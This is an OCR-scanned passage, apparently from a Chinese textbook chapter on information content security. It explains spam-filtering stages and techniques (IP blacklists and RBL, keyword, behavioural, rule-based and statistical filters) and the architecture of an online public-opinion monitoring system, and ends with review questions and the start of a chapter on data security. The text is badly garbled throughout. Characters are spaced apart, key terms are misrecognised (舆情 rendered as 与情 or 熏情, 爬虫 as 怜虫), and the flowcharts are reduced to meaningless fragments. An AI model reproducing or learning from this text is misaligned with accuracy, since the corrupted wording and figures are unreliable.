件 发 送 DATA 指令 之 前 的 过 滤 ,邮件 对 话 可 以 在 SMTP 连接 开始 .HELO/EHLO 指令 、 
Mail From 指令 和 Rept To 指令 中 对 会 话 数 据 进 行 检 查 。 若 在 检查 中 该 会 话 符合 过 滤 的 
条 件 , 则 按照 规则 采取 相应 的 动作 ,如 直接 在 会 话 阶段 断 开 发 出 警告 代码 等 。@ 四 对 信 头 
和 信 体 进行 检查 , 即 邮件 在 发 送 DATA 指令 后 的 过 滤 。 实 际 上 ,发 送 邮件 数据 后 的 检查 
是 在 邮件 数据 传输 基本 完毕 后 进行 的 ,因此 并 不 能 节省 下 被 垃圾 邮件 占用 的 带宽 和 处 理 
能 力 ,只 是 可 以 让 用 户 不 再 收 到 这 些 已 经 被 过 滤 的 垃圾 邮件 。 

(2) MDA 过 滤 : 指 从 MTA 中 接收 到 的 邮件 后 ,在 本 地 或 远程 递交 时 进行 检查 ,对 
于 符合 过 滤 条 件 的 邮件 进行 过 滤 处 理 。 大 多 数 的 MTA 过 滤器 并 不 检查 邮件 的 内 容 , 对 
邮件 内 容 的 过 滤 一 般 由 MDA 来 完成 。 
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(3) MUA 过 滤 : MTA 和 MDA 过滤 都 是 在 邮件 服务 端的 过 滤 , 位 于 电子 邮件 服务 
器 上 ,往往 不 能 针对 用 户 的 个 性 化 特点 设置 一 些 具 有 针对 性 的 过 滤 规 则 ,而 用 户 通常 希望 
能 自主 设置 .管理 个 人 过 滤器 的 规则 。 因 此 ,该 功能 可 通过 邮件 客户 端 MUA 过 滤 来 实 
现 ,通常 将 识别 出 来 的 垃圾 邮件 单独 存放 在 一 个 专门 的 邮箱 文件 夹 中 。 当 前 大 多 数 邮 件 
客户 端 都 支持 MUA 过 滤 ,如 Outlook Express、Foxmail 等 。 

3. 垃圾 邮件 的 特征 分 析 

当前 ,电子 邮件 的 主要 特征 模型 层次 分 为 网 络 层 和 应 用 层 , 主 要 考虑 的 因素 如 表 10-4 
所 示 ,其 中 分 别 用 1、2、3 表示 特征 的 重要 程度 : 1 表示 重要 性 强 , 特 征明 显 ;2 表示 重要 性 
次 之 ;3 表示 重要 性 更 次 。 特 征 重要 性 的 评估 直接 关系 到 垃圾 邮件 衡量 大 小 的 选择 。 


表 10-4 垃圾 邮件 层次 特征 


层 次 特征 描述 重要 性 
二 IP 地 址 是 否 可 信 1 
IP 链接 数量 ,频率 是 否 异常 1 
X-mailer 没有 或 是 特殊 字段 2 
Mail From 字段 不 相同 或 反 向 解析 与 真实 的 IP 不 符 或 包含 关键 词 2 
Received: 时 间 有 误 ,传送 时 间 长 ,其 中 标识 的 IP 地 址 有 误 , 有 3 个 以 i 
上 Received 或 包含 关键 词 
2 Reply-to: 与 From 字段 不 相同 或 包含 关键 词 1 
Message-id 伪造 、whois 查询 的 结果 该 域名 不 存在 1 
Data: 时 间 在 当前 时 间 之 前 1 
下 时 车 Subject; 包含 关键 词 1 
Ce: 抄 送 人 字段 包含 关键 词 2 
信 体 的 大 小 问题 ,过 大 (包含 内 嵌 资 源 或 是 大 邮件 奢 炸 ) 或 批量 空 信 1 
附件 的 大 小 问题 ,附件 过 大 2 
ja 附件 的 类 型 问题 ,为 声音 、 图 片 . 可 执行 文件 或 包含 恶意 宏 1 
信 体 .附件 包含 关键 词 2 
信 体 .附件 语义 分 析 包含 垃圾 信息 


在 信 体 特征 中 , 信 体 、 附 件 语义 分 析 包 括 垃圾 信息 ,这 一 特征 中 要 求 的 中 文 文本 语义 
分 析 是 一 个 很 复杂 的 机 器 学 习 过 程 。 该 过 程 能 够 用 于 自动 化 垃圾 邮件 特征 的 提取 ,再 辅 
以 人 工 , 可 实现 大 部 分 的 垃圾 邮件 文本 特征 。 中 文 文本 由 于 其 特殊 性 ,文本 分 析 也 比较 复 
杂 , 需 要 先进 行 分 词 ,词性 和 词义 标注 ,进而 实现 词汇 整合 ,短语 、 句 子 的 语义 分 析 , 最 后 将 
句子 整合 为 句 群 ,达到 段 内 、 文 本 语义 分 析 的 目的 。 

4. 垃圾 邮件 过 滤 系 统 流程 

一 般 地 ,垃圾 邮件 过 滤 系 统 处 理 流程 可 表示 为 图 10-19 所 示 。 电 子 邮 件 是 以 一 定 的 
编码 方式 在 网 络 上 根据 SMTP 协议 进行 传输 的 数据 包 。 在 SMTP 会 话 过 程 中 ,可 以 根据 
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会 话 过 程 中 的 Mail From 和 Rcpt To 等 会 话 进行 过 滤 。 然 后 ,将 得 到 的 邮件 数据 包 进 行 
解码 ,得 到 普通 文本 格式 。 如 上 所 述 , 电 子 邮 件 的 一 般 格 式 包 括 信 头 和 信 体 两 部 分 ,其 中 
信 头 包括 发 件 人 地 址 、. 收 件 人 地 址 .主题 .日 期 .路 由 等 重要 信息 , 信 体 是 邮件 的 正文 。 大 
部 分 情况 下 ,可 根据 信 头 信息 即 可 判断 一 封 邮 件 是 否 是 垃圾 邮件 ,故而 先 分 离 信 头 和 信 
体 , 然 后 分 别 进行 基于 信 头 和 基于 内 容 的 过 滤 。 在 基于 内 容 的 过 滤 中 ,计算 机 是 无 法 识别 
文本 邮件 的 内 容 , 因 而 首先 进行 分 词 处 理 , 同 时 进行 必要 的 词义 消 歧 ,然后 根据 垃圾 邮件 
的 文本 表示 构造 表示 该 邮件 文本 的 特征 向 量 , 最 后 将 文本 的 特征 向 量 通过 邮件 过 滤器 ,区 
分 出 正常 邮件 和 垃圾 邮件 。 对 于 正常 邮件 ,直接 编码 ,按照 SMTP 协议 发 送 给 邮件 服务 
器 ,而 对 于 垃圾 邮件 则 进行 过 滤 处 理 。 


电子 邮件 
f 
协议 解析 
f 
基于 地 址 过 滤 
i 
解码 
i 
提取 信 头 和 信 体 
f 


基于 信 头 的 过 滤 
1 
分 词 
1 

构造 特征 向 量 


这 是 六 扳 志 作 正常 邮件 编码 、 转 发 


垃 极 邮件 处 理 
图 10-19 垃圾 电子 邮件 过 滤 流 程 


5. 典型 的 垃圾 邮件 过 滤 技术 

当前 ,通过 过 滤器 实现 垃圾 邮件 过 滤 的 主要 技术 可 分 为 : 

1) 基于 IP 地 址 的 过 滤 技 术 

该 类 方法 主要 包括 基于 黑 / 白 名 单 、 实 时 黑 名 单 .DNS 反 向 查询 等 。 例 如 ,基于 黑白 
名 单 的 方法 首先 通过 维护 一 个 黑 / 白 名 单列 表 , 其 中 黑 名 单列 表 保存 了 已 经 被 确认 为 垃圾 
邮件 发 送 者 的 邮箱 地 址 .邮件 服务 器 域名 和 转发 服务 器 IP 地 址 等 ; 白 名 单列 表 维 持 了 一 
个 信任 列表 ;然后 通过 检查 邮件 是 否 来 自 这 些 邮 箱 或 服务 器 来 判断 是 否 为 垃圾 邮件 。 实 
时 黑 名 单 (Real-time Blackhole List,RBL) 是 通过 DNS 查询 的 方式 提供 对 某 个 IP 或 域名 
是 不 是 垃圾 邮件 发 送 源 的 判断 。 具 体 而 言 , 若 某 IP 地 址 在 某 个 RBL 列表 中 , 则 查询 会 返 
回 一 个 具体 的 解析 结构 ,该 邮件 就 会 被 丢弃 ;车 该 IP 地 址 没有 在 RBL 列表 中 , 则 查询 返 
回 一 个 查询 错误 , 则 该 邮件 为 正常 邮件 。 一 般 情况 下 ,RBL 服务 的 提供 和 维护 是 比较 有 
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信誉 的 组 织 提供 ,如 中 国 反 垃圾 邮件 联盟 等 。DNS 反 向 查询 通过 将 发 送 服 务 器 的 IP 进 
行 DNS 反 向 解析 得 到 的 域名 与 信 头 中 其 声称 的 是 否 一 致 来 判断 是 否 是 垃圾 邮件 。 

2) 基于 关键 字 的 过 滤 技术 

该 技术 通过 信 头 和 信 体 中 是 否 含有 设 定 的 关键 字 来 判断 邮件 是 否 是 垃圾 邮件 ,然后 
进行 相应 的 处 理 。 该 技术 的 基础 是 需要 创建 一 个 关键 字库 ,一般 情况 下 可 以 定义 一 些 反 
映 垃 圾 邮件 特征 的 关键 词 或 短语 ,如 “免费 ”“ 特 价 ” 等 。 这 种 技术 实现 起 来 比较 简单 ,但 
是 缺点 是 需要 手工 维护 关键 字 列 表 ,并 且 存 在 较 高 的 误 判 率 。 另 外 , 若 通过 对 关键 字 进 行 
某 些 变化 可 以 很 容易 避 开 这 种 检测 。 

3) 基于 行为 识别 的 过 滤 技 术 

通过 行为 识别 技术 可 有 效 区 分 正常 邮件 和 垃圾 邮件 的 行为 特征 。 一 般 地 ,行为 识别 
技术 包括 信息 发 送 过 程 中 的 各 类 行为 因素 ,如 发 送 时 间 发 送 频 度 .发送 IP、 发 送 地 址 、 收 
件 地址 、 回 复 地 址 协议 声明 和 指纹 识别 等 。 常 见 的 垃圾 邮件 发 送行 为 可 分 为 以 下 四 种 : 

(1) 邮件 滥 发 行为 : 垃圾 邮件 发 送 者 登录 邮件 服务 器 进行 联机 查询 或 投递 邮件 ,学 
试 各 种 方式 投递 邮件 ,发 件 主机 异常 变动 等 行为 。 

(2) 邮件 非法 行为 : 垃圾 邮件 发 送 者 借用 各 地 的 多 个 开启 了 Open Relay 邮件 转发 功 
能 的 邮件 服务 器 来 发 送 邮 件 的 行为 。 

(3) 邮件 匿名 行为 : 发 件 人 、 收 件 人 、 发 件 主机 或 邮件 传输 信息 刻意 隐匿 ,使 得 无 法 
追溯 其 来 源 的 行为 。 

(4) 邮件 伪造 行为 : 发 件 人 、 收 件 人 、 发 件 主机 或 邮件 传输 信息 经 过 刻意 伪造 ,经 查 
证 不 属实 的 行为 。 

基于 行为 识别 技术 的 垃圾 邮件 过 滤 技 术 的 基本 原理 ,如 图 10-20 所 示 。 首 先 通过 
数据 采集 ,收集 训练 邮件 数据 集合 。 然 后 对 收集 到 的 邮件 进行 预 处 理 ,包括 从 原始 邮 
件 信息 中 提取 信 头 信息 、 选 取 具 有 垃圾 邮件 可 区 分 性 的 行为 特征 、 对 行为 特征 数据 进 
行 向 量化 处 理 和 确定 特征 的 权重 信息 。 最 终 建 立行 为 识别 模型 ,并 对 测试 邮件 进行 分 
类 判别 。 


训练 邮件 收集 测试 邮件 
| PR 了 
| 提取 信 头 ! 
Eo 
车 [行为 特 征 提 到 |]， 为 人 
所 | 1 上 半 胡 
全 ER | 从 列 
1 1 
1 
![ 特征 权重 |] ， 垃圾 邮件 
I 1 
(一 一 一 一 一 一 一 一 一 一 一 一 一 一 必 


图 10-20 ”基于 行为 识别 的 垃圾 邮件 过 滤 技 术 


4) 基于 规则 的 过 滤 技术 
基于 规则 的 过 滤 技术 是 从 大 量 训练 样本 中 提取 有 规律 性 的 特征 生成 过 滤 规 则 ,然后 
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利用 该 规则 判断 新 到 达 的 邮件 是 否 是 垃圾 邮件 。 比 较 简 单 的 规则 邮件 过 滤器 的 构建 可 由 
邮件 服务 器 管理 员 对 大 量 的 垃圾 邮件 进行 人 工分 析 , 从 中 找 出 垃圾 邮件 的 明显 特征 ,人 为 
设 定 一 些 关 于 邮件 头 字段 .正文 中 简单 字符 串 的 匹配 规则 。 一 般 情 况 下 ,通过 机 器 学 习 中 
的 智能 算法 从 训练 集中 提炼 过 滤 规 则 ,当前 常用 利用 过 滤 规 则 实现 垃圾 邮件 过 滤 的 方法 
有 : Ripper 方法 、 决 策 树 (Decision tree) 方 法 .PART 方法 ,Boosting 方法 .粗糙 集 (Rough 
set) 方 法 。 

5) 基于 统计 内 容 的 过 滤 技术 

基于 统计 内 容 的 过 滤 技 术 是 将 垃圾 邮件 过 滤 看 成 是 一 个 二 值 信息 分 类 问题 , 即 是 否 
是 垃圾 邮件 ,通过 提取 信 头 和 信 体 ,利用 数据 挖掘 和 机 器 学 习 的 相关 技术 ,进行 训练 分 类 。 
目前 常见 的 基于 统计 内 容 的 过 滤 技术 有 KNN (K-Nearest Neighbor)、 SVM (Support 
Vector Machine) 、Rocchio 方法 、 神 经 网 络 方法 和 Bayesian 方法 等 。 
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互联 网 的 开放 性 .自由 性 和 便捷 性 等 特点 使 得 网 络 与 论 的 表达 诉求 日 益 多 元 化 。 人 
们 能 在 网 上 随时 随地 分 享 自己 的 意见 ,情绪 和 态度 ,其 中 既 包括 积极 的 ,也 包括 消极 的 消 
息 内 容 。 在 网 络 人 人 都 参与 的 今天 ,任何 突 发 事件 的 发 生 或 者 热点 与 论 的 谈论 都 会 吸引 
大 量 的 注意 力 , 其 传播 速度 快 .受众 广 , 并 且 难 以 控制 ,很 容易 造成 强烈 的 与 论 压力 。 当 与 
论 被 蓄意 误 后 , 极 有 可 能 造成 不 可 想象 的 破坏 ,并 且 难 以 控制 ,将 对 社会 稳定 和 国家 安全 
造成 极 大 的 危害 。 因 此 ,通过 构建 网 络 与 情 监控 系统 ,实时 采集 相关 信息 ,智能 分 析 信 息 
内 容 , 及 时 发 现 与 情 危 机 ,能 为 自动 化 解决 监控 \ 处 理 网 络 与 情 提供 技术 支持 ,从 而 极 大 的 
辅助 有 关 部 门 正确 地 处 理 与 情 危 机 。 

1. 网 络 与 情 的 概念 及 特点 

网 络 与 情 没 有 统一 的 定义 ,一 般 地 ,网 络 与 情 是 指 由 于 各 种 事件 的 刺激 而 产生 的 人 们 
对 该 事件 的 所 有 认 知 态度、 情感 和 行为 倾向 的 集合 ,是 社会 不 同 领域 在 网 络 上 的 不 同 表 
现 , 有 政治 与 情 法 制 与 情 . 道 德 与 情 和 消费 与 情 等 。 

一 般 地 ,网 络 与 情 具 有 以 下 几 方 面 的 特点 : 

(1) 网 络 与 情 的 自由 性 。 网 络 的 开放 性 使 得 每 个 人 都 可 以 成 为 网 络 信息 的 发 布 者 ， 
可 以 在 网 络 上 发 表 自己 的 意见 。 同 时 由 于 互联 网 的 匿名 特点 ,多 数 网 民 会 自然 地 反映 出 
自己 的 真实 情绪 。 因 此 ,网 络 与 情 比较 客观 地 反映 了 现实 社会 的 矛盾 ,比较 真实 地 体现 了 
不 同 群体 的 价值 。 

(2) 网 络 与 情 的 交互 性 。 在 互联 网 上 ,网 民 普遍 表现 出 强烈 的 参与 意识 。 在 对 某 一 
问题 或 事件 发 表意 见 、 进 行 评 论 的 过 程 中 ,常常 有 许多 网 民 参 与 讨论 ,网 民 之 间 经 常 形成 
互动 场面 ,赞成 方 的 观点 和 反对 方 的 观点 同时 出 现 ,相互 探 讨 ` 争 论 ,相互 交汇 、 碰 撞 , 甚 至 
出 现 意见 交锋 。 

(3) 网 络 与 情 的 多 元 性 。 网 上 与 情 的 主题 极为 宽泛 ,话题 的 确定 往往 是 自发 ,随意 的 。 
从 与 情 主体 的 范围 来 看 ,网 民 分 布 于 社会 各 阶层 和 各 个 领域 ;从 与 情 的 话题 来 看 ,涉及 政治 、 
经 济 . 文 化 军事、 外交 以 及 社会 生活 的 各 个 方面 ;从 与 情 来 源 上 看 ,网 民 可 以 在 不 受 任何 干 
扰 的 情况 下 预先 写 好 言论 ,随时 在 网 上 发 布 ,发 表 后 的 言论 可 以 被 任意 评论 和 转载 。 


a 
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(4) 网 络 与 情 的 偏差 性 。 由 于 受 各 种 主客 观 因素 的 影响 ,一 些 网 络 言论 缺乏 理性 , 比 
较 感 性 化 和 情绪 化 ,甚至 有 些 人 把 互联 网 作为 发 泄 情绪 的 场所 ,通过 相互 感染 ,这 些 情 绪 
化 言论 很 可 能 在 众人 的 响应 下 ,发 展 成 为 有 害 的 与 论 。 

(5) 网 络 与 情 的 突 发 性 。 网 络 与 论 的 形成 往往 非常 迅速 ,一 个 热点 事件 的 存在 加 上 
一 种 情绪 化 的 意见 ,就 可 以 成 为 点 燃 一 片 与 论 的 导 火 索 。 当 某 一 事件 发 生 时 ,网 民 可 以 立 
即 在 网 络 中 发 表意 见 , 网 民 个 体 意 见 可 以 迅速 地 汇聚 起 来 形成 公共 意见 。 同 时 ,各 种 渠道 
的 意见 又 可 以 迅速 地 进行 互动 ,从 而 迅速 形成 强大 意见 声势 。 

2. 网 络 舆 情 监控 系统 架构 

互联 网 上 的 信息 量 十 分 巨大 , 仅 依靠 人 工 的 方法 很 难 完成 网 上 海量 信息 的 收集 和 处 
理 。 因 此 ,有 必要 形成 一 套 自动 化 网 络 和 与 情 监 控 系 统 ,由 被 动 防 堵 转 换 为 主动 引导 。 因 
此 ,一 个 典型 的 网 络 与 情 监控 系统 应 包括 如 下 模块 : 网 络 与 情 信息 采集 、 网 络 与 情 分 析 处 
理 和 网 络 与 情 服务 ,具体 如 图 10-21 所 示 。 


用 户 部 门 领导 
界面 显示 多 方式 上 报 与 情 简报 出 
有 
敏感 信息 监测 奥 情 预警 与 情 检索 二 
熏 情 跟踪 趋势 预测 热点 发 现 务 
奥 情 知识 库 
熏 情 信息 挖 所 网 
热点 话题 识别 倾向 性 分 析 ”| … |[ 赵 势 分 析 ] | 策 
情 
分 
与 情 信息 预 处 理 未 
自动 排 重 | | 网 页 去 噪 | | 自动 分词 | .… | 语义 分 析 | | 玛 
信息 检索 库 
PT Eb 
同 络 息 忠 技术 
通用 网 络 让 中 垂直 型 民 虫 批量 型 种 役 
起 与 
全 
论坛 新 闻 | 博客 
是 
微 博 贴吧 ”| 其 他 集 


图 10-21 网 络 熏 情 监控 系统 架构 
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1) 网 络 与 情 信 息 采 集 

一 般 情况 下 ,用 户 按照 具体 的 需求 定制 信息 采集 参数 ,包括 需要 监控 的 网 站 、 采 集 频 
率 、 关 注 网 页 报道 的 类 型 以 及 感 兴趣 的 关键 字 。 在 参数 定制 好 后 ,系统 在 后 台 运 行 网 络 和 与 
情 信 息 采集 模 块 , 通 过 各 种 类 型 的 网 络 怜 虫 技 术 来 抓 取 整 个 互联 网 中 的 所 有 与 与 情 相 关 
的 信息 ,并 将 这 些 信息 放 和 人 信息 检索 库 中 。 具 体 的 网 络 怜 虫 技术 在 10. 2. 1 节 中 已 经 进行 
了 相关 的 介绍 。 总 体 而 言 ,该 模块 主要 完成 以 下 功能 : 

(1) 采集 各 种 论坛 .新闻 留言 板 \、 博 客 、 微 博 、 贴 吧 等 信息 源 的 各 类 信息 ,主要 以 文本 
为 主 ,同时 也 包括 图 像 .音频 和 视频 等 多 媒体 信息 ; 

(2) 能 够 实现 满足 用 户 需 求 的 定向 网 络 和 与 情 信息 的 抓 取 ; 

(3) 支持 具有 多 线程 分 布 式 采集 功能 的 高 速 采集 技术 ; 

(4) 支持 具有 身份 验证 的 网 络 的 采集 ,需要 提供 合法 的 用 户 账号 ; 

(5) 内 置 自动 转 码 功能 ,可 以 将 Big5 或 Unicode 编码 统一 转换 为 GBK 进行 后 续 
处 理 。 

2) 网 络 与 情 分 析 处 理 

该 阶段 包括 信息 检索 库 、 和 与 情 信息 预 处 理 . 和 与 情 信息 挖掘 和 熏 情 知识 库 四 个 部 分 组 
成 。 信 息 检索 库 主 要 用 来 存储 网 络 候 虫 抓 取 的 海量 信息 ;和 与 情 知识 库 用 来 存储 熏 情 相关 
信息 。 这 里 重点 介绍 与 情 信 息 预 处 理 和 和 与 情 信 息 挖掘 两 个 模块 。 

与 情 信 息 预 处 理 阶 段 主 要 用 来 完成 自动 排 重 .内容 提 取 ,自动 分 词 和 语义 分 析 等 。 

(1) 自动 排 重 。 用 来 识别 网 络 疏 虫 采集 到 得 网 页 信息 ,以 便 剔除 一 些 重复 元 余 的 网 
页 ,以 便 大 幅度 减少 网 页 的 数量 ,提高 网 页 搜索 的 效率 ,降低 后 续 操 作 的 工作 量 和 存储 复 
杂 度 。 目 前 ,网 页 自动 排 重 的 主要 思路 是 从 输入 的 文本 中 提取 适当 的 特征 ;然后 和 以 前 输 
入 的 文本 的 特征 进行 比较 判断 。 常 见 的 网 页 排 重 算法 有 DSC (Digital syntactic 
clustering) 算 法 改进 的 DSC-SS 算法 (DSC-supershingle) ,I-Match 算法 、 基 于 关键 词 匹 
配 的 向 量 空间 模型 检测 算法 等 。 

(2) 网 页 去 品 。 主 要 用 来 识别 并 排除 与 网 页 主题 无 关 的 噪音 信息 ,如 广告 信息 、 版 权 
信息 等 ,从 而 实现 网 页 净化 。 网 页 噪音 容易 导致 主题 漂移 , 即 在 一 个 网 页 中 存在 多 个 主题 
的 情况 。 当 网 页 经 过 净化 后 ,系统 可 以 快速 识别 并 提取 网 页 中 主题 信息 ,将 之 作为 处 理 对 
象 ,可 提高 处 理 结果 的 准确 度 ;另外 网 页 净化 可 以 简化 网 页 内 标签 结构 的 复杂 度 并 减少 网 
页 的 大 小 ,从 而 节省 后 续 处 理 过 程 的 时 间 和 空间 开销 。 目 前 ,常用 的 方法 是 通过 构建 高 效 
的 .具有 自动 性 和 可 适应 性 的 包装 器 来 实现 噪音 识别 和 网 页 净化 。 

(3) 自动 分 词 。 利 用 分 词 技术 文本 表示 、 特 征 选择 等 处 理 文本 信息 都 是 后 续 处 理 过 
程 的 基础 ,相关 的 方案 已 经 在 第 10. 3 节 中 进行 了 介绍 。 

(4) 语义 分 析 。 是 指 运用 各 种 机 器 学 习 方 法 ,挖掘 与 学 习 文 本 、 图 像 等 深层 次 概念 。 
对 于 网 页 文本 信息 而 言 ,是 在 分 析 句 子 的 句法 结构 和 辨析 句 中 每 个 词 词义 的 基础 上 ,推导 
句 义 的 形式 化 表达 。 巾 于 自然 语言 的 复杂 性 , 浅 层 语义 分 析出 现 简化 了 语义 分 析 方 式 。 
其 基于 一 套 非 严 格 定义 的 标签 体系 ,标注 句子 的 部 分 成 分 并 以 标注 结构 作为 分 析 结 果 ,所 
弃 了 深层 成 分 和 关系 的 复杂 性 ,能 在 真实 语 料 环境 下 实现 快速 分 析 ,获得 比 深层 分 析 更 高 
的 准确 率 。 通 过 更 深层 次 的 自然 语言 处 理 和 分 析 , 相 比 简单 的 分 词 和 匹配 技术 能 够 更 有 
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效 表达 奥 情 信息 所 包含 的 各 种 情绪 、 意 见 和 态度 等 。 

与 情 信 息 挖掘 模块 是 在 与 情 信息 预 处 理 的 基础 上 进一步 分 析 网 页 相关 信息 ,主要 
包括 : 

(1) 热点 话题 识别 。 话 题 识别 与 跟踪 (Topic Detection and Tracking,TDT) 是 网 络 
和 与 情 监控 中 的 关键 技术 之 一 。 具 体 而 言 ,是 指 在 新 闻 专 线 和 广播 新 闻 等 来 源 的 数据 流 中 
自动 发 现 主题 并 把 主题 相关 的 内 容 联 系 在 一 起 的 技术 。 通 过 TDT 能 帮助 人 们 把 分 散 的 
信息 有 效 地 汇集 并 组 织 起 来 ;从 整体 上 了 解 一 个 事件 的 全 部 细节 以 及 与 该 事件 与 其 他 事 
件 之 间 的 关系 ,有 助 于 进行 历史 性 研究 。 目 前 ,TDT 可 应 用 于 大 规模 动态 信息 中 新 热门 
话题 发 现 、 指 定 话题 跟踪 、 实 时 监控 关键 人 物 动 态 和 分 析 信 息 的 倾向 性 .判定 和 预警 有 害 
话题 等 。 

热点 话题 识别 作为 TDT 的 一 种 应 用 ,是 构建 在 网 络 奥 情 信息 采集 和 预 处 理 的 基础 
上 ,根据 文献 [62], 热 点 话题 识别 的 一 般 包括 文本 获取 、 文 本 表示 ,话题 聚 类 和 热度 评估 四 
个 阶段 ,其 中 前 两 个 阶段 在 上 面 已 经 进行 介绍 。 这 里 仅 介绍 话题 聚 类 和 热度 评估 ,一 般 实 
现 框架 如 图 10-22 所 示 。 


| 话题 聚 类 | | 热度 评估 | 
1 人 
文本 相似 性 计算 ”上 一 | 网 络 特征 参量 提取 | 
| 1 1 
| 1 下 1 
文本 聚 类 | | 热度 评估 模型 | 
人 否 1 1 h | 
| 薄 足 结束 条 伞 调整 类 向 量 | | 类 评分 及 排序 | 
是 | | 1 | 
1 
| [|] … [i] | [ 热 中 话题 !] | 热门 话题 |。 [ 热 中 话题 N| | 
| 1 


图 10-22 热点 话题 识别 


话题 聚 类 的 核心 思想 是 一 个 文本 集 被 聚 成 若干 称 为 篮 的 子 集 , 每 个 复 中 的 文本 之 间 
具有 较 大 的 相似 性 。 在 基于 文本 表示 的 基础 上 ,通过 计算 文本 之 间 的 相似 性 实现 话题 聚 
类 。 当 前 常用 的 相似 度 计算 有 基于 距离 的 相似 度 计算 方法 、 基 于 本 体 的 语义 相似 度 计算 
方法 、 基 于 索引 图 的 概念 相似 度 计算 等 。 

在 话题 聚 类 之 后 ,可 得 到 一 组 用 聚 类 中 心 表 示 的 话题 向 量 , 每 个 话题 向 量 包含 一 个 特 
征 项 序列 ,通过 热度 评估 模型 提取 出 某 一 个 时 间 段 内 的 热点 话题 。 当 前 ,针对 新 闻 报 道 所 
建立 的 热度 评估 模型 大 多 结合 媒体 关注 度 和 用 户 关 注 度 两 个 方面 建立 ,通过 提取 网 络 特 
征 参量 计算 媒体 报道 频率 .话题 分 布 率 、 报 道 时 长 等 ,显然 媒体 关注 度 的 高 低 与 网 络 特征 
参量 的 数值 成 正比 ,而 用 户 关注 度 可 以 通过 获取 每 篇 报道 的 点 击 率 和 评论 数 等 方法 来 
计算 。 

(2) 倾向 性 分 析 。 网 页 文本 倾向 性 分 析 是 指 对 说 话 人 的 态度 (或 称 观点 情感) 进行 
分 析 , 即 对 文本 中 对 事件 或 产品 的 评论 ,看 法 等 主观 信息 进行 分 析 和 挖掘 ,进而 得 到 评价 
的 主观 倾向 ,如 正面 负面 或 者 中 立 。 网 络 与 情 预 处 理 阶 段 的 浅 层 语义 分 析 实 现 了 一 种 浅 
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层 的 语义 理解 ,能 够 较 好 地 为 倾向 分 析 提 供 良好 的 语言 分 析 基 础 。 


当前 ,文本 倾向 性 分 析 主 要 包括 基于 语义 的 文本 倾向 性 研究 和 基于 机 器 学 习 的 文本 
倾向 性 研究 。 总 体 来 看 ,文本 情感 倾向 性 分 析 可 分 为 词语 情感 倾向 性 分 析 、 句 子 情感 倾向 
性 分 析 、 篇 章 情感 倾向 性 分 析 和 海量 数据 倾向 性 预测 。 

3) 网 络 与 情 服务 

网 络 与 情 服务 模块 主要 提供 与 情 跟踪 趋势 预测 、 热 点 发 现 ` 敏 感 信 息 监 测 . 与 情 预 
警 .与 情 检 索 .与 情 信息 显示 等 功能 。 例 如 ,热点 发 现 利 用 热点 话题 识别 功能 来 提供 热点 
事件 的 关键 字 ,原文 索引 等 信息 。 对 发 现 的 热点 事件 可 按照 热度 的 不 同 进行 排序 ,然后 以 
与 情 简报 的 形式 向 用 户 或 上 级 报道 。 敏 感 信息 检测 是 指 通过 信息 内 容 的 分 析 方式 ,从 大 
量 文件 中 发 现 包 含 敏感 信息 的 文件 和 内 容 。 和 与 情 预 警 是 指 根据 相关 信息 重复 的 次 数 , 设 
置 一 定 的 报警 阔 值 ,保证 在 较 短 时 间 内 产生 预警 信息 ,使 管理 部 门 能 发 现 并 及 时 采取 处 理 
措施 ,根据 信息 的 危险 性 和 重要 性 ,可 分 为 不 同 级 别 的 预警 。 和 与 情 信 息 显 示 是 通过 一 个 与 
情 信 息 分 析 平 台 ,利用 地 理 信息 ,新闻 、 视 频 等 资源 ,以 立体 的 、 直 观 的 、 自 然 的 方式 呈现 给 
用 户 。 


10.6 本 章 小 结 


本 章 主要 介绍 信息 内 容 安全 的 相关 概念 及 关键 技术 。 首 先 , 本 章 介绍 信息 内 容 安 全 
的 相关 概念 .安全 威胁 及 体系 架构 ,重点 阐述 信息 内 容 安全 概念 和 信息 安全 之 间 的 关系 ， 
以 及 信息 内 容 安全 架构 。 然 后 ,以 信息 内 容 处 理 流程 为 主线 ,重点 介绍 信息 内 容 安全 的 关 
键 技术 ,包括 信息 内 容 获取 技术 、 信 息 内 容 识 别 与 分 析 和 信息 内 容 控 制 与 管理 。 最 后 , 结 
合 两 种 具体 的 应 用 系统 ,阐述 信息 内 容 安全 在 实际 生活 中 的 应 用 。 
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. 简 述 什么 是 信息 内 容 安全 ? 它 与 信息 安全 有 何 关系 ? 

.当前 信息 内 容 安 全 面临 哪些 安全 威胁 ? 

. 简 述 信息 内 容 主 动 获取 技术 和 被 动 获取 技术 的 主要 思想 。 

. 搜索 引擎 的 原理 是 什么 ? 简 述 其 工作 流程 。 

. 简 述 网 络 疏 虫 的 工作 原理 ,并 说 明 怜 虫 的 类 型 和 抓 取 策 略 。 

. 简 述 网 络 数 据 包 捕获 的 原理 ,并 说 明 在 Windows 下 有 哪些 网 络 数据 捕获 方法 ? 
. 简 述 当前 中 文 分 词 有 哪些 主要 的 方法 ? 并 比较 它们 的 优 缺 点 。 

. 文本 表示 有 哪些 模型 ? 各 自 有 何 优 缺 点 ? 
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9. 当前 文本 特征 主要 的 提取 方法 有 哪些 ? 


. 肤色 检测 的 步骤 有 哪些 ? 当前 静态 肤色 检测 有 哪些 方法 ? 

. 什么 是 信息 内 容 过 滤 ? 其 与 信息 检索 ,信息 分 类 ,信息 抽取 有 什么 区 别 ? 

. 请 简 述 信息 过 滤 系 统 的 工作 流程 。 

. 什么 是 信息 隐藏 技术 ? 其 与 密码 学 ,数字 水 印 有 何 关系 ? 

. 信息 隐藏 的 主要 流程 包括 哪些 部 分 ? 

. 什么 是 数字 水 印 和 版 权 保护 ?请 简 述 如 何 通 过 数字 水 印 实现 数字 版 权 保 护 。 
.当前 主要 的 垃圾 邮件 过 滤 技 术 有 哪些 ? 请 简 述 这 些 技术 的 主要 思想 。 

. 什么 是 网 络 与 情 ? 其 具有 哪些 特点 ? 

.当前 网 络 与 情 架构 至 少 包括 哪些 部 分 ? 各 自主 要 完成 哪些 主要 的 功能 ? 


本 章 学 习 要 点 : 

如 掌握 数据 备份 相关 概念 及 实现 技术 ; 
如 掌握 云 计算 相关 概念 ; 

避 熟 悉 云 计算 体系 结构 ; 

名 熟悉 云 计算 面临 的 安全 威胁 ; 

名 了 解 当前 云 计算 安全 主要 保护 技术 。 


11.1 数据 安全 概述 


数据 安全 通常 有 两 方面 的 含义 : 中 数据 本 身 的 安全 ,主要 指 采 用 现代 密码 算法 对 数 
据 进行 主动 保护 ; @ 数 据 的 防护 安全 ,主要 是 采用 现代 信息 存储 手段 对 数据 进行 主动 防 
